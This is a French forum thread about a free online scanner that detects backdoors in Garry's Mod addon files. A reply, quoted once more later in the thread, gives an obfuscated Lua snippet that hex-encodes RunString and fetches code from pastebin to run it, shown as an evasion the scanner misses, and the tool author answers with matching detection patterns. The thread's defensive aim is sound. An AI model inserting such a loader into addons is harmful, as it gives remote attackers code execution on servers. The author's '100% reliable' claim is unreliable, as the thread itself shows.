Tuto Détecteur de Backdoors pour Addons Garry’s Mod – Gratuit et Instantané

• Initiateur de la discussion HeXoTiiiKzz60
  • Date de début
  • Initiateur de la discussion
HeXoTiiiKzz60

HeXoTiiiKzz60

Geek
Score réaction
2
Salut à tous,

J’ai créé un site web gratuit qui permet de détecter automatiquement les backdoors et fonctions suspectes dans les fichiers .zip des addons Garry’s Mod.

Il suffit de glisser-déposer votre addon sur le site pour obtenir en quelques secondes :

• Un score de sécurité sur 100
  • La liste des menaces détectées (backdoors, commandes douteuses, hooks suspects, superadmin forcé, etc.)
  • Des recommandations claires pour savoir si l’addon est sûr ou non

️ ️ Pas besoin d’installation, tout se fait directement en ligne. C’est rapide, simple et fiable.

Exemple :

• Fichier “Critique.zip” : 4 menaces détectées (backdoor console, hook, superadmin forcé…) – Score : 0/100
    Critique.png

• Fichier “Op.zip” : aucune menace – Score : 100/100
    OP.png

L’outil est actuellement en version 1. Il est déjà fiable à 100 % pour les menaces connues à ce jour.

Si jamais vous trouvez un addon avec un backdoor qui passe à travers les mailles du filet, merci de le signaler en commentaire pour que je puisse améliorer la détection.

Lien vers l’outil : Anti-Backdoors Gmod
100 % gratuit – aucun compte nécessaire

N’hésitez pas à partager autour de vous ou à me faire des retours !

Dernière édition:
Nataop

Nataop

Nouveau né
Score réaction
6
HeXoTiiiKzz60 à dit:
Il est déjà fiable à 100 %

En vrai un truc comme

local h = "http"..".Fetch"
_G["\x52\x75\x6E\x53\x74\x72\x69\x6E\x67"](""..h.."('https://pastebin.com/', function(body, len, headers, code) RunString(body) end)", "S", false)

ça détecte pas

1748728680955.png

En vrai c'est un bon début, mais je te conseil d'utiliser par exemple Ollama avec un bon LLM, certes ça va prendre un peu plus de temps à check, mais la détection sera bien plus sûr, et c'est gratos en plus de ça, je te conseil par contre de mettre une file d'attente si tu fais ça histoire de pas surcharger ton serveur

Pièces jointes

• 1748728674859.png
    1748728674859.png
    11.7 KB Vues: 1
HeXoTiiiKzz60

HeXoTiiiKzz60

Geek
Score réaction
2
Nataop à dit:
En vrai un truc comme

local h = "http"..".Fetch"
_G["\x52\x75\x6E\x53\x74\x72\x69\x6E\x67"](""..h.."('https://pastebin.com/', function(body, len, headers, code) RunString(body) end)", "S", false)

ça détecte pas

Regarde la pièce jointe 74515

En vrai c'est un bon début, mais je te conseil d'utiliser par exemple Ollama avec un bon LLM, certes ça va prendre un peu plus de temps à check, mais la détection sera bien plus sûr, et c'est gratos en plus de ça, je te conseil par contre de mettre une file d'attente si tu fais ça histoire de pas surcharger ton serveur
Salut !

Merci de ton retour !
Effectivement c'est une très bonne idée d'ajouter une IA pour une recherche approfondie :) Je me renseigne demain pour l'ajouter sur la machine et au site :)

en attendant, j'ai ajouté manuellement ces patterns:

• RunString obfusqué (hex) = Critique
  • Pastebin + code obfusqué = Critique
  • HTTP obfusqué par concaténation = Critique

Si tu as d'autres patterns qui passent entre les mailles du filet je suis ouvert ! :)

Nataop

Nataop

Nouveau né
Score réaction
6
HeXoTiiiKzz60 à dit:
Salut !

Merci de ton retour !
Effectivement c'est une très bonne idée d'ajouter une IA pour une recherche approfondie :) Je me renseigne demain pour l'ajouter sur la machine et au site :)

en attendant, j'ai ajouté manuellement ces patterns:

• RunString obfusqué (hex) = Critique
  • Pastebin + code obfusqué = Critique
  • HTTP obfusqué par concaténation = Critique

Si tu as d'autres patterns qui passent entre les mailles du filet je suis ouvert ! :)
Pas de soucis, si tu veux je peux un t'aider ! Passe ton discord si besoin je t'ajouterais

HeXoTiiiKzz60

HeXoTiiiKzz60

Geek
Score réaction
2
Nataop à dit:
Pas de soucis, si tu veux je peux un t'aider ! Passe ton discord si besoin je t'ajouterais
C'est gentil :) Je te donne mon discord: hexotiiikzz ;)

Discord d'entraide
Rejoignz-nous sur Discord